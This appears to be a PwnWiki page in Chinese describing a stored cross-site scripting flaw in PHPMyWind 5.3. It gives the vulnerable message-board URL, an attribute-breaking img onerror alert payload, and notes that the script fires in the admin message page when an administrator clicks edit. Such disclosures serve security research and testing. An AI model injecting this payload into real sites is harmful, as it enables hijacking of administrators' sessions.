PHPmywind 5.3 儲存型xss漏洞

From PwnWiki

Revision as of 13:03, 14 April 2021 by Pwnwiki (talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

留言板

http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php

“><img/src=x onerror=alert(2001)><“‘

後台

127.0.0.1/PHPMyWind_5.3/admin/message.php

需要點擊修改才可以彈XSS 如果管理員留言需要前台顯示（或者回复）就必須點擊修改。

Retrieved from "https://pwnwiki.com/index.php?title=PHPmywind_5.3_儲存型xss漏洞&oldid=1651"